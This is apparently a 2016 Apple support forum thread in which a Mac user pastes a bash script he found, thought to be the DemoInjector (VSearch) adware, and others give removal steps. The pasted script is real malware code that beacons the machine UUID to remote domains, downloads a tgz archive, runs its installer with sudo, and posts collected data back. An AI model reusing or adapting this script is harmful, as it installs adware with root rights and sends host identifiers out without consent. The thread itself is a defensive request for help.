Removing DemoInjector (Mac.Trojan.VSearch)

Question

Level 1

8 points

Removing DemoInjector (Mac.Trojan.VSearch)

Hi,

I see below script in root path (named /file) and assume I have accidently installed the DemoInjector (Mac.Trojan.VSearch).

-------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------------

#!/bin/bash

# ioreg -l | grep -e Manufacturer -e 'Vendor Name'

updFile="/var/tmp/updText.txt"

updFileError="/var/tmp/updTextError.txt"

chmod 777 $updFile;

chmod 777 $updFileError;

echo > $updFile

echo > $updFileError

br_mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

midFile=$(find /System/Library/Frameworks -type f -name "*.uuid.plist" -print0 | xargs -0 ls -tl | sort -n | tail -1 | awk '{print $9}')

if [ -e "$midFile" ]; then

mid=$(echo "$midFile" | python -c 'import sys;print open(sys.stdin.read().rstrip(), "r").read().split("<string>")[1].split("</string>")[0]')

echo "mid: $mid." >> $updFile

fi

get_pd_client_data="http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=$br_mid&ct=pd"

data=$(curl -s "$get_pd_client_data")

dc=""

channel=$(echo $dc | tr -d '[[:space:]]' | tr -cd 0-9)

pdChannel=${dc:2}

echo "DC: $dc" >> $updFile

click_id="0"

echo "CLICK_ID: $click_id" >> $updFile

click_stamp=""

echo "CLICK_STAMP: $click_stamp" >> $updFile

id=$dc"--"$click_id"___"$click_stamp"___"$br_mid

echo "Full ID: $id" >> $updFile

domain=""http://aa81bf391151884adfa3dd677e41f94be1.com""

pop_url="'http://aa81bf391151884adfa3dd677e41f94be1.com/pp/fd?re=1&uid=[MACHINE_ID]&u=[CON TEXT_URL]'"

pop_delay="1"

if [ $midFile ]; then

frm=$(echo $midFile | tail -1 | awk -F "/" '{print $5}' | awk -F "." '{print $1}')

fi

mid_proc=false

if [ $frm ];then

if ps -ef | grep -v grep | grep -q $frm; then

mid_proc=true

fi

echo "midFile: $midFile." >> $updFile

echo "frm: $frm" >> $updFile

echo "mid_proc: $mid_proc" >> $updFile

pInj () {

tmpfile="/var/tmp/dit7.tgz"

filePath="/var/tmp/DemoInjector10042016"

/usr/bin/curl -s -L -o $tmpfile "http://pullmenow.com/pd_files/dit7.tgz" #Vipul - this is from where it download

sleep 10

tar -xzf $tmpfile -C /var/tmp/

sleep 5

sudo chmod 777 $filePath/install_Injector.sh

echo sudo $filePath/install_Injector.sh A$pdChannel $click_id $domain >> $updFile

sudo $filePath/install_Injector.sh A$pdChannel $click_id $domain

sleep 30

rm -rf $tmpfile

rm -rf $filePath

}

shouldPDInj="1"

echo $shouldPDInj

if [[ $mid_proc = false && "$shouldPDInj" == "1" ]]; then

echo "vs_inj_no_mid" >> $updFile

echo "Installing pInj with logger" >> $updFile

pInj &> $updFileError;

sleep 10

echo $(</var/tmp/updTextError.txt) >> $updFile

else

echo "vs_inj_mid: $mid" >> $updFile

fi

eventType="Update Script Output"

sleep 30

curl --request POST 'http://93a555685cc7443a8e1034efa1f18924.com/v/pd-logger' --data "vs_mid=$mid" --data "br_mid=$br_mid" --data-urlencode "event_type=$eventType" --data-urlencode "event_data=$(<$updFile)"

sleep 5

rm -rf $updFile

rm -rf /var/tmp/updText2.txt

rm -rf $updFileError

-------------------------------------------------------------------------------- -------------------------------------------------------------------------------- ---------------------

Also see below two in /etc/passwd

_clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false

_amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false

I have renamed /file to /file.txt and rebooted.

I am familiar with unix but new to Mac.

Need advise how to remove.

Thanks,

-Vipul.

MacBook Pro (Retina, 15-inch, Mid 2015), OS X El Capitan (10.11.4)

Posted on May 16, 2016 10:21 PM

Reply

Answer 1

Courcoul

Level 6

18,588 points

May 17, 2016 12:08 AM in response to vipulkuruppu

Try running MalwareBytes Anti-Malware.

Reply

Answer 2

vipulkuruppu Author

Level 1

8 points

May 17, 2016 12:52 AM in response to Courcoul

Thanks.

I se what you've mentioned is another freeware. Would it be possible to remove it manually without installing any anti-virus software.

Reply

Answer 3

OGELTHORPE

Level 9

57,317 points

May 17, 2016 3:06 AM in response to vipulkuruppu

Malwarebytes Anti-Malware for Mac is NOT an AV application. All it does is search for malware/adware and the user decides what to delete or retain. It runs only when you open it, never in the background. It is safe and comprehensive. It even has been recommended for use by Apple telephone support and genius bar technicians.

Ciao.

Reply

Answer 4

dominic23

Level 10

83,952 points

May 17, 2016 4:50 AM in response to vipulkuruppu

This is an adware injecting Trojan.

For info about this:

Demonjector VSearch.7

http://vms.drweb-av.es/virus/?_is=2&i=7986808

1. Remove the adware manually by following the “HowTo” from Apple.

http://support.apple.com/en-us/HT203987

2. Disable/Uninstall Extensions and test.

Safari > Preferences > Extensions

Select and disable all extensions and test.

Enable Extensions one by one and test.

To uninstall any extension, select it and click the “Uninstall” button.

3. Safari > Preferences > Search > Search Engine:

Select your preferred search engine.

4. Safari > Preferences > General > Homepage:

Set your Homepage.

Note: Using https://www.malwarebytes.org/antimalware/mac/ is easy.

Thomas Reed, the author of Malwarebytes-antimalware for Mac is "one of us" here and highly regarded.

You have indicated that you changed the name of it. I don't know what impact it will have on the removal process.

Best.

Reply

Answer 5

Linc Davis

Level 10

209,649 points

May 17, 2016 11:12 AM in response to vipulkuruppu

You may have installed ad-injection malware ("adware").

Don't use any kind of "anti-virus" or "anti-malware" product on a Mac. There is never a need for it, and relying on it for protection makes you more vulnerable to attack, not less.

Back up all data first.

If you're not already running the latest version of OS X, updating or upgrading in the App Store may cause the adware to be removed automatically. If you are already running the latest version, please log out or restart the computer. Again, some kinds of malware will be removed—not all. There is no such thing as automatic removal of all possible malware, either by OS X or by third-party software. That's why you can't rely on software to protect you.

If the malware is removed in your case, you'll still need to make changes to the way you use the computer to protect yourself from further attacks. Ask if you need guidance.

If the malware is not removed automatically, see below.

This easy procedure will detect any kind of adware that I know of. Deactivating it is a separate, and even easier, procedure.

Some legitimate software is ad-supported and may display ads in its own windows or in a web browser while it's running. That's not malware and it may not show up. Also, some websites carry intrusive popup ads that may be mistaken for adware.

If none of your web browsers is working well enough to carry out these instructions, restart the computer in safe mode. The malware will be disabled temporarily.

Step 1

Please triple-click the line below on this page to select it, then copy the text to the Clipboard by pressing the key combination command-C:

~/Library/LaunchAgents

In the Finder, select

Go ▹ Go to Folder...

from the menu bar and paste into the box that opens by pressing command-V. Press return. Either a folder named "LaunchAgents" will open, or you'll get a notice that the folder can't be found. If the folder isn't found, go to the next step.

If the folder does open, press the key combination command-2 to select list view, if it's not already selected. Please don't skip this step.

There should be a column in the Finder window headed Date Modified. Click that heading twice to sort the contents by date with the newest at the top. If necessary, enlarge the window so that all of the contents are showing.

Follow the instructions in this support article under the heading "Take a screenshot of a window." An image file with a name beginning in "Screen Shot" should be saved to the Desktop. Open the screenshot and make sure it's readable. If not, capture a smaller part of the screen showing only what needs to be shown.

Start a reply to this message. Drag the image file into the editing window to upload it. You can also include text in the reply.

Leave the folder open for now.

Step 2

Do as in Step 1 with this line:

/Library/LaunchAgents

The folder that may open will have the same name, but is not the same, as the one in Step 1. As in that step, the folder may not exist.

Step 3

Repeat with this line:

/Library/LaunchDaemons

This time the folder will be named "LaunchDaemons."

Step 4

Open the Safari preferences window and select the Extensions tab. If any extensions are listed, post a screenshot. If there are no extensions, or if you can't launch Safari, skip this step.

Step 5

If you use the Firefox or Chrome browser, open its extension list and do as in Step 4.

Reply

Answer 6

QGFreire

Level 1

8 points

Jun 1, 2016 11:01 AM in response to dominic23

https://www.malwarebytes.org/antimalware/mac/

Worked for me.

I was in a hurry. I'm selfish 😊 I should have obeyed my Guru - Linc Davis

Reply